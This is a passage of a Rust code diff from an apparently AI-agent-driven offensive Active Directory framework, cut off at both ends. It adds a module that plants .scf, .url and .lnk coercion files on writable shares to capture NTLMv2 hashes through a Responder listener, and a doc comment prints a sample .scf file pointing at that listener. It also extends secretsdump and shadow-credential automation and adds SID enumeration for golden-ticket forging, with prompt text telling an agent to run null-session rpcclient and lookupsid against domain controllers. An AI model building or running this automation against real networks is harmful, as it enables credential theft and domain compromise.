"contoso.local")); // pragma: allowlist secret + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_writable_share_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].share_host, "192.168.58.22"); + assert_eq!(work[0].share_name, "Public"); + assert_eq!(work[0].dedup_key, "searchconn:192.168.58.22:Public"); + assert_eq!(work[0].listener, "192.168.58.50"); + } + + #[test] + fn collect_readonly_share_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "READ")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + state.mark_processed( + DEDUP_SEARCHCONNECTOR, + "searchconn:192.168.58.22:Public".into(), + ); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_prefers_domain_matched_credential() { + let mut state = StateInner::new("test-op".into()); + 
state + .credentials + .push(make_credential("crossuser", "Cross!1", "fabrikam.local")); // pragma: allowlist secret + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .hosts + .push(make_host("192.168.58.22", "srv01.contoso.local")); + state + .shares + .push(make_share("192.168.58.22", "Data", "READ/WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + assert_eq!(work[0].credential.domain, "contoso.local"); + } + + #[test] + fn collect_falls_back_to_first_credential_no_host() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + // No host entry for this share IP, so domain is empty -> falls back to first cred + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_multiple_shares_produces_work_for_each() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "Data", "READ/WRITE")); + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 2); + let names: Vec<&str> = work.iter().map(|w| w.share_name.as_str()).collect(); + assert!(names.contains(&"Public")); + assert!(names.contains(&"Data")); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + } + let state = shared.read().await; + let work = collect_searchconnector_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].share_host, "192.168.58.22"); + } +} diff --git a/ares-cli/src/orchestrator/automation/secretsdump.rs b/ares-cli/src/orchestrator/automation/secretsdump.rs index 005da2b5..27d84f9c 100644 --- a/ares-cli/src/orchestrator/automation/secretsdump.rs +++ b/ares-cli/src/orchestrator/automation/secretsdump.rs @@ -84,7 +84,7 @@ pub async fn auto_local_admin_secretsdump( let mut items = Vec::new(); for cred in &creds { - for (dc_domain, dc_ip) in state.domain_controllers.iter() { + for (dc_domain, dc_ip) in state.all_domains_with_dcs().iter() { if is_valid_secretsdump_target(dc_domain, &cred.domain) { let dedup = secretsdump_dedup_key(dc_ip, &cred.domain, &cred.username); if !state.is_processed(DEDUP_SECRETSDUMP, &dedup) { @@ -135,7 +135,7 @@ pub async fn auto_local_admin_secretsdump( for dominated in &state.dominated_domains { let dom = dominated.to_lowercase(); // Find parent domain DCs: domains where the child ends with ".{parent}" - for (dc_domain, dc_ip) in state.domain_controllers.iter() { + for (dc_domain, dc_ip) in state.all_domains_with_dcs().iter() { if is_child_of(&dom, dc_domain) { // Find Administrator NTLM hash from the dominated child domain if let Some(hash) = state.hashes.iter().find(|h| { diff --git 
a/ares-cli/src/orchestrator/automation/shadow_credentials.rs b/ares-cli/src/orchestrator/automation/shadow_credentials.rs index 4d8759ec..f1ba4861 100644 --- a/ares-cli/src/orchestrator/automation/shadow_credentials.rs +++ b/ares-cli/src/orchestrator/automation/shadow_credentials.rs @@ -82,29 +82,14 @@ pub async fn auto_shadow_credentials( .unwrap_or("") .to_string(); - // Find credential for the source user - let credential = state - .credentials - .iter() - .find(|c| { - c.username.to_lowercase() == source_user.to_lowercase() - && (domain.is_empty() - || c.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned(); - - // Also check for NTLM hash as fallback + // Find credential for the source user. The source user's + // own domain may differ from the vuln's target `domain` + // (cross-forest ACL edges like charlie@contoso → + // ivy@fabrikam), so we cannot domain-restrict the + // lookup against the target. + let credential = state.find_source_credential(&source_user, &domain); let hash = if credential.is_none() { - state - .hashes - .iter() - .find(|h| { - h.username.to_lowercase() == source_user.to_lowercase() - && h.hash_type.to_uppercase() == "NTLM" - && (domain.is_empty() - || h.domain.to_lowercase() == domain.to_lowercase()) - }) - .cloned() + state.find_source_hash(&source_user, &domain) } else { None }; diff --git a/ares-cli/src/orchestrator/automation/share_coercion.rs b/ares-cli/src/orchestrator/automation/share_coercion.rs new file mode 100644 index 00000000..be68f281 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/share_coercion.rs @@ -0,0 +1,515 @@ +//! auto_share_coercion -- drop coercion files (.scf, .url, .lnk) on writable +//! shares to capture NTLMv2 hashes via Responder/ntlmrelayx. +//! +//! When a user browses to a share containing one of these files, Windows +//! automatically connects back to the attacker-controlled listener, leaking the +//! user's NTLMv2 hash. This is a passive credential harvesting technique. +//! +//! Requires: writable shares discovered by share_enum, a listener IP for the +//! UNC path in the coercion file, and Responder running on the listener. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect share coercion work items from current state. +/// +/// Pure logic extracted from `auto_share_coercion` so it can be unit-tested +/// without needing a `Dispatcher` or async runtime. Returns at most 3 items +/// per call to avoid flooding the dispatcher. 
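+///
+/// For orientation only: the dropped files are rendered by the coercion
+/// worker, not here. A classic `.scf` coercion payload looks roughly like
+/// the sketch below (listener address is an illustrative assumption);
+/// Explorer fetches the IconFile UNC path as soon as the directory listing
+/// is rendered, leaking the browsing user's NTLMv2 hash:
+///
+/// ```text
+/// [Shell]
+/// Command=2
+/// IconFile=\\192.168.58.50\c\icon.ico
+/// [Taskbar]
+/// Command=ToggleDesktop
+/// ```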
+fn collect_share_coercion_work(state: &StateInner, listener: &str) -> Vec<ShareCoercionWork> { + if state.credentials.is_empty() { + return Vec::new(); + } + + let cred = match state.credentials.first() { + Some(c) => c.clone(), + None => return Vec::new(), + }; + + state + .shares + .iter() + .filter(|s| { + let perms = s.permissions.to_uppercase(); + perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE") + }) + .filter(|s| { + // Skip default admin/system shares + let name_upper = s.name.to_uppercase(); + !matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ) + }) + .filter(|s| { + let dedup_key = format!("{}:{}", s.host, s.name); + !state.is_processed(DEDUP_WRITABLE_SHARES, &dedup_key) + }) + .map(|s| ShareCoercionWork { + host: s.host.clone(), + share_name: s.name.clone(), + listener: listener.to_string(), + credential: cred.clone(), + }) + .take(3) // limit per cycle to avoid flooding + .collect() +} + +/// Monitors for writable shares and dispatches coercion file drops. +/// Interval: 45s. +pub async fn auto_share_coercion(dispatcher: Arc<Dispatcher>, mut shutdown: watch::Receiver<bool>) { + let mut interval = tokio::time::interval(Duration::from_secs(45)); + interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay); + + loop { + tokio::select! { + _ = interval.tick() => {}, + _ = shutdown.changed() => break, + } + if *shutdown.borrow() { + break; + } + + if !dispatcher.is_technique_allowed("share_coercion") { + continue; + } + + let listener = match dispatcher.config.listener_ip.as_deref() { + Some(ip) => ip.to_string(), + None => continue, // need listener for UNC path in coercion files + }; + + let work: Vec<ShareCoercionWork> = { + let state = dispatcher.state.read().await; + collect_share_coercion_work(&state, &listener) + }; + + for item in work { + let payload = json!({ + "technique": "share_coercion", + "target_ip": item.host, + "share_name": item.share_name, + "listener_ip": item.listener, + "credential": { + "username": item.credential.username, + "password": item.credential.password, + "domain": item.credential.domain, + }, + }); + + let priority = dispatcher.effective_priority("share_coercion"); + match dispatcher + .throttled_submit("coercion", "coercion", payload, priority) + .await + { + Ok(Some(task_id)) => { + info!( + task_id = %task_id, + host = %item.host, + share = %item.share_name, + "Share coercion file drop dispatched" + ); + + let dedup_key = format!("{}:{}", item.host, item.share_name); + dispatcher + .state + .write() + .await + .mark_processed(DEDUP_WRITABLE_SHARES, dedup_key.clone()); + let _ = dispatcher + .state + .persist_dedup(&dispatcher.queue, DEDUP_WRITABLE_SHARES, &dedup_key) + .await; + } + Ok(None) => { + debug!( + host = %item.host, + share = %item.share_name, + "Share coercion task deferred by throttler" + ); + } + Err(e) => { + warn!( + err = %e, + host = %item.host, + share = %item.share_name, + "Failed to dispatch share coercion" + ); + } + } + } + } +} + +struct ShareCoercionWork { + host: String, + share_name: String, + listener: String, + credential: ares_core::models::Credential, +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::orchestrator::state::StateInner; + use ares_core::models::{Credential, Share}; + + fn make_credential(username: &str, password: &str, domain: &str) -> Credential { + Credential { + id: format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at:
None, + parent_id: None, + attack_step: 0, + } + } + + fn make_share(host: &str, name: &str, permissions: &str) -> Share { + Share { + host: host.into(), + name: name.into(), + permissions: permissions.into(), + comment: String::new(), + } + } + + #[test] + fn dedup_key_format() { + let key = format!("{}:{}", "192.168.58.22", "Users"); + assert_eq!(key, "192.168.58.22:Users"); + } + + #[test] + fn dedup_set_name() { + assert_eq!(DEDUP_WRITABLE_SHARES, "writable_shares"); + } + + #[test] + fn admin_shares_filtered() { + let admin_shares = ["C$", "ADMIN$", "IPC$", "PRINT$", "SYSVOL", "NETLOGON"]; + for name in &admin_shares { + let name_upper = name.to_uppercase(); + assert!( + matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} should be filtered" + ); + } + } + + #[test] + fn non_admin_shares_pass() { + let user_shares = ["Users", "Public", "Data", "shared"]; + for name in &user_shares { + let name_upper = name.to_uppercase(); + assert!( + !matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} should pass through" + ); + } + } + + #[test] + fn writable_permission_matching() { + let writable = ["WRITE", "READ/WRITE", "rw WRITE access"]; + for p in &writable { + let perms = p.to_uppercase(); + let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE"); + assert!(is_writable, "{p} should be writable"); + } + } + + #[test] + fn readonly_permission_rejected() { + let readonly = ["READ", "NONE", "DENIED"]; + for p in &readonly { + let perms = p.to_uppercase(); + let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE"); + assert!(!is_writable, "{p} should NOT be writable"); + } + } + + #[test] + fn payload_structure_validation() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "admin".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let payload = serde_json::json!({ + "technique": "share_coercion", + "target_ip": "192.168.58.22", + "share_name": "Users", + "listener_ip": "192.168.58.50", + "credential": { + "username": cred.username, + "password": cred.password, + "domain": cred.domain, + }, + }); + + assert_eq!(payload["technique"], "share_coercion"); + assert_eq!(payload["target_ip"], "192.168.58.22"); + assert_eq!(payload["share_name"], "Users"); + assert_eq!(payload["listener_ip"], "192.168.58.50"); + assert_eq!(payload["credential"]["username"], "admin"); + assert_eq!(payload["credential"]["password"], "P@ssw0rd!"); // pragma: allowlist secret + assert_eq!(payload["credential"]["domain"], "contoso.local"); + } + + #[test] + fn admin_share_filtering_lowercase_variations() { + let lower_admin_shares = ["c$", "admin$", "ipc$", "print$", "sysvol", "netlogon"]; + for name in &lower_admin_shares { + let name_upper = name.to_uppercase(); + assert!( + matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} (lowercase) should be filtered after uppercasing" + ); + } + } + + #[test] + fn writable_permission_with_change_keyword() { + let perm = "CHANGE"; + let perms = perm.to_uppercase(); + let is_writable = perms == "WRITE" || perms == "READ/WRITE" || perms.contains("WRITE"); + assert!(!is_writable, "CHANGE alone should not match WRITE logic"); + } + + #[test] + fn 
work_struct_construction() { + let cred = ares_core::models::Credential { + id: "c1".into(), + username: "testuser".into(), + password: "P@ssw0rd!".into(), // pragma: allowlist secret + domain: "contoso.local".into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + }; + + let work = ShareCoercionWork { + host: "192.168.58.22".into(), + share_name: "Data".into(), + listener: "192.168.58.50".into(), + credential: cred, + }; + + assert_eq!(work.host, "192.168.58.22"); + assert_eq!(work.share_name, "Data"); + assert_eq!(work.listener, "192.168.58.50"); + assert_eq!(work.credential.username, "testuser"); + assert_eq!(work.credential.domain, "contoso.local"); + } + + #[test] + fn per_cycle_limit_of_three() { + let shares: Vec<String> = (0..10).map(|i| format!("Share{i}")).collect(); + let limited: Vec<&String> = shares.iter().take(3).collect(); + assert_eq!(limited.len(), 3); + assert_eq!(*limited[0], "Share0"); + assert_eq!(*limited[2], "Share2"); + } + + #[test] + fn empty_share_name_handling() { + let name = ""; + let name_upper = name.to_uppercase(); + assert!( + !matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "Empty share name should pass admin filter" + ); + } + + #[test] + fn case_insensitive_admin_share_check() { + let mixed_case = ["Sysvol", "NetLogon", "Admin$", "Ipc$"]; + for name in &mixed_case { + let name_upper = name.to_uppercase(); + assert!( + matches!( + name_upper.as_str(), + "C$" | "ADMIN$" | "IPC$" | "PRINT$" | "SYSVOL" | "NETLOGON" + ), + "{name} should be filtered regardless of case" + ); + } + } + + // --- collect_share_coercion_work tests --- + + #[test] + fn collect_empty_state_returns_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .shares + .push(make_share("192.168.58.22", "Users", "WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_shares_returns_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_writable_share_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Users", "WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host, "192.168.58.22"); + assert_eq!(work[0].share_name, "Users"); + assert_eq!(work[0].listener, "192.168.58.50"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_readonly_share_skipped() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Users", "READ")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_admin_shares_filtered() { + let mut
state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "ADMIN$", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "C$", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "IPC$", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "SYSVOL", "WRITE")); + state + .shares + .push(make_share("192.168.58.22", "NETLOGON", "WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_already_processed() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Users", "WRITE")); + state.mark_processed(DEDUP_WRITABLE_SHARES, "192.168.58.22:Users".into()); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert!(work.is_empty()); + } + + #[test] + fn collect_limits_to_three_per_cycle() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + for i in 0..5 { + state + .shares + .push(make_share("192.168.58.22", &format!("Share{i}"), "WRITE")); + } + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 3); + } + + #[test] + fn collect_read_write_permission_produces_work() { + let mut state = StateInner::new("test-op".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Data", "READ/WRITE")); + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].share_name, "Data"); + } + + #[tokio::test] + async fn collect_via_shared_state() { + let shared = SharedState::new("test-op".into()); + { + let mut state = shared.write().await; + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .shares + .push(make_share("192.168.58.22", "Public", "WRITE")); + } + let state = shared.read().await; + let work = collect_share_coercion_work(&state, "192.168.58.50"); + assert_eq!(work.len(), 1); + assert_eq!(work[0].host, "192.168.58.22"); + } +} diff --git a/ares-cli/src/orchestrator/automation/sid_enumeration.rs b/ares-cli/src/orchestrator/automation/sid_enumeration.rs new file mode 100644 index 00000000..4cd11565 --- /dev/null +++ b/ares-cli/src/orchestrator/automation/sid_enumeration.rs @@ -0,0 +1,426 @@ +//! auto_sid_enumeration -- enumerate domain SIDs and well-known SID mappings. +//! +//! Queries each discovered DC via LDAP to resolve the domain SID, then maps +//! well-known RIDs (500=Administrator, 502=krbtgt, 512=Domain Admins, etc.) +//! to confirm account names. This is useful when the RID-500 account has +//! been renamed (e.g., not "Administrator"). +//! +//! Also discovers the domain SID needed for golden ticket forging and +//! ExtraSid attacks. + +use std::sync::Arc; +use std::time::Duration; + +use serde_json::json; +use tokio::sync::watch; +use tracing::{debug, info, warn}; + +use crate::orchestrator::dispatcher::Dispatcher; +use crate::orchestrator::state::*; + +/// Collect SID enumeration work items from current state. 
+///
+/// Pure logic extracted from `auto_sid_enumeration` so it can be unit-tested
+/// without needing a `Dispatcher` or async runtime.
+fn collect_sid_enum_work(state: &StateInner) -> Vec<SidEnumWork> {
+    if state.credentials.is_empty() {
+        return Vec::new();
+    }
+
+    let mut items = Vec::new();
+
+    for (domain, dc_ip) in &state.all_domains_with_dcs() {
+        // Skip if we already have the SID for this domain
+        if state.domain_sids.contains_key(domain) {
+            continue;
+        }
+
+        let dedup_key = format!("sid_enum:{}", domain.to_lowercase());
+        if state.is_processed(DEDUP_SID_ENUMERATION, &dedup_key) {
+            continue;
+        }
+
+        let cred = match state
+            .credentials
+            .iter()
+            .find(|c| {
+                !c.password.is_empty()
+                    && c.domain.to_lowercase() == domain.to_lowercase()
+                    && !state.is_credential_quarantined(&c.username, &c.domain)
+            })
+            .or_else(|| {
+                state.credentials.iter().find(|c| {
+                    !c.password.is_empty()
+                        && !state.is_credential_quarantined(&c.username, &c.domain)
+                })
+            }) {
+            Some(c) => c.clone(),
+            None => continue,
+        };
+
+        items.push(SidEnumWork {
+            dedup_key,
+            domain: domain.clone(),
+            dc_ip: dc_ip.clone(),
+            credential: cred,
+        });
+    }
+
+    items
+}
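The dispatch loop below relies on the result processor's `extract_lsaquery_domain_sid` to lift the domain SID out of a null-session `rpcclient ... lsaquery` transcript. A minimal sketch of that extraction, assuming the stock rpcclient output format of `Domain Name:` / `Domain Sid:` lines; the function name and return shape here are illustrative stand-ins, not the actual parser:

```rust
/// Hypothetical stand-in for the result processor's lsaquery parsing.
/// Returns (domain_name, domain_sid) when both lines are present.
fn parse_lsaquery(output: &str) -> Option<(String, String)> {
    let mut name = None;
    let mut sid = None;
    for line in output.lines() {
        let line = line.trim();
        if let Some(v) = line.strip_prefix("Domain Name:") {
            name = Some(v.trim().to_string());
        } else if let Some(v) = line.strip_prefix("Domain Sid:") {
            sid = Some(v.trim().to_string());
        }
    }
    // Option::zip yields Some only when both halves were captured.
    name.zip(sid)
}
```

The real implementation is regex-based per the comment in the loop; the point is only that the `Domain Sid:` line is the piece that unblocks `forge_inter_realm_and_dump`.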
+
+/// Enumerate domain SIDs and well-known accounts.
+/// Interval: 45s.
+pub async fn auto_sid_enumeration(
+    dispatcher: Arc<Dispatcher>,
+    mut shutdown: watch::Receiver<bool>,
+) {
+    let mut interval = tokio::time::interval(Duration::from_secs(45));
+    interval.set_missed_tick_behavior(tokio::time::MissedTickBehavior::Delay);
+
+    loop {
+        tokio::select! {
+            _ = interval.tick() => {},
+            _ = shutdown.changed() => break,
+        }
+        if *shutdown.borrow() {
+            break;
+        }
+
+        if !dispatcher.is_technique_allowed("sid_enumeration") {
+            continue;
+        }
+
+        let work: Vec<SidEnumWork> = {
+            let state = dispatcher.state.read().await;
+            collect_sid_enum_work(&state)
+        };
+
+        for item in work {
+            // Cross-forest authenticated RPC/LDAP from the source forest's
+            // credential typically returns ACCESS_DENIED — but `rpcclient
+            // -U "" -N -c lsaquery` over a null session usually succeeds
+            // against DCs that allow anonymous LSA queries (most legacy
+            // configurations). The agent loop won't try the null-session
+            // path on its own when handed a credential, so we explicitly
+            // instruct it to fall through. The result-processor's
+            // `extract_lsaquery_domain_sid` regex captures the resulting
+            // `Domain Name: / Domain Sid:` block and caches it against the
+            // domain, which unblocks `forge_inter_realm_and_dump`.
+            let cred_is_cross_forest = !item
+                .credential
+                .domain
+                .to_lowercase()
+                .ends_with(&item.domain.to_lowercase())
+                && !item
+                    .domain
+                    .to_lowercase()
+                    .ends_with(&item.credential.domain.to_lowercase())
+                && item.credential.domain.to_lowercase() != item.domain.to_lowercase();
+            let instructions = if cred_is_cross_forest {
+                Some(format!(
+                    "Resolve the domain SID and RID-500 account name for {dom} ({dc}). \
+                     The provided credential is from a different forest and authenticated \
+                     RPC/LDAP from outside this forest typically fails with ACCESS_DENIED. \
+                     Run `rpcclient -U \"\" -N {dc} -c \"lsaquery\"` first (null/anonymous \
+                     session — no credential needed) to capture the `Domain Name:` and \
+                     `Domain Sid:` lines. Then run `impacket-lookupsid` with the provided \
+                     credential as a secondary attempt for RID-500 mapping. Report both \
+                     outputs verbatim via task_complete tool_outputs so the parser can \
+                     extract the SID.",
+                    dom = item.domain,
+                    dc = item.dc_ip,
+                ))
+            } else {
+                None
+            };
+
+            let mut payload = json!({
+                "technique": "sid_enumeration",
+                "target_ip": item.dc_ip,
+                "domain": item.domain,
+                "credential": {
+                    "username": item.credential.username,
+                    "password": item.credential.password,
+                    "domain": item.credential.domain,
+                },
+            });
+            if let Some(text) = instructions {
+                payload["instructions"] = json!(text);
+            }
+
+            let priority = dispatcher.effective_priority("sid_enumeration");
+            match dispatcher
+                .throttled_submit("recon", "recon", payload, priority)
+                .await
+            {
+                Ok(Some(task_id)) => {
+                    info!(
+                        task_id = %task_id,
+                        domain = %item.domain,
+                        dc = %item.dc_ip,
+                        "SID enumeration dispatched"
+                    );
+                    dispatcher
+                        .state
+                        .write()
+                        .await
+                        .mark_processed(DEDUP_SID_ENUMERATION, item.dedup_key.clone());
+                    let _ = dispatcher
+                        .state
+                        .persist_dedup(&dispatcher.queue, DEDUP_SID_ENUMERATION, &item.dedup_key)
+                        .await;
+                }
+                Ok(None) => {
+                    debug!(domain = %item.domain, "SID enumeration deferred");
+                }
+                Err(e) => {
+                    warn!(err = %e, domain = %item.domain, "Failed to dispatch SID enumeration");
+                }
+            }
+        }
+    }
+}
+
+struct SidEnumWork {
+    dedup_key: String,
+    domain: String,
+    dc_ip: String,
+    credential: ares_core::models::Credential,
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn dedup_key_format() {
+        let key = format!("sid_enum:{}", "contoso.local");
+        assert_eq!(key, "sid_enum:contoso.local");
+    }
+
+    #[test]
+    fn dedup_set_name() {
+        assert_eq!(DEDUP_SID_ENUMERATION, "sid_enumeration");
+    }
+
+    #[test]
+    fn payload_structure_has_correct_technique() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "admin".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+        let payload = json!({
+            "technique": "sid_enumeration",
+            "target_ip": "192.168.58.10",
+            "domain": "contoso.local",
+            "credential": {
+                "username": cred.username,
+                "password": cred.password,
+                "domain": cred.domain,
+            },
+        });
+        assert_eq!(payload["technique"], "sid_enumeration");
+        assert_eq!(payload["target_ip"], "192.168.58.10");
+        assert_eq!(payload["domain"], "contoso.local");
+    }
+
+    #[test]
+    fn work_struct_construction() {
+        let cred = ares_core::models::Credential {
+            id: "c1".into(),
+            username: "admin".into(),
+            password: "P@ssw0rd!".into(), // pragma: allowlist secret
+            domain: "contoso.local".into(),
+            source: "test".into(),
+            is_admin: false,
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+        };
+        let work = SidEnumWork {
+            dedup_key: "sid_enum:contoso.local".into(),
+            domain: "contoso.local".into(),
+            dc_ip: "192.168.58.10".into(),
+            credential: cred,
+        };
+        assert_eq!(work.domain, "contoso.local");
+        assert_eq!(work.dc_ip, "192.168.58.10");
+        assert_eq!(work.credential.username, "admin");
+    }
+
+    #[test]
+    fn dedup_key_normalizes_domain() {
+        let key = format!("sid_enum:{}", "CONTOSO.LOCAL".to_lowercase());
+        assert_eq!(key, "sid_enum:contoso.local");
+    }
+
+    #[test]
+    fn dedup_keys_differ_per_domain() {
+        let key1 = format!("sid_enum:{}", "contoso.local");
+        let key2 = format!("sid_enum:{}", "fabrikam.local");
+        assert_ne!(key1, key2);
+    }
+
+    fn make_credential(
+        username: &str,
+        password: &str,
+        domain: &str,
+    ) -> ares_core::models::Credential {
+        ares_core::models::Credential {
+            id:
format!("c-{username}"), + username: username.into(), + password: password.into(), // pragma: allowlist secret + domain: domain.into(), + source: "test".into(), + is_admin: false, + discovered_at: None, + parent_id: None, + attack_step: 0, + } + } + + #[test] + fn collect_empty_state_no_work() { + let state = StateInner::new("test-op".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_no_credentials_no_work() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_single_domain_with_cred() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + let work = collect_sid_enum_work(&state); + assert_eq!(work.len(), 1); + assert_eq!(work[0].domain, "contoso.local"); + assert_eq!(work[0].dc_ip, "192.168.58.10"); + assert_eq!(work[0].credential.username, "admin"); + } + + #[test] + fn collect_skips_domain_with_known_sid() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state + .domain_sids + .insert("contoso.local".into(), "S-1-5-21-1234".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_dedup_skips_processed() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("admin", "P@ssw0rd!", "contoso.local")); // pragma: allowlist secret + state.mark_processed(DEDUP_SID_ENUMERATION, "sid_enum:contoso.local".into()); + let work = collect_sid_enum_work(&state); + assert!(work.is_empty()); + } + + #[test] + fn collect_cross_domain_fallback() { + let mut state = StateInner::new("test-op".into()); + state + .domain_controllers + .insert("contoso.local".into(), "192.168.58.10".into()); + state + .credentials + .push(make_credential("crossuser", "P@ssw0rd!", 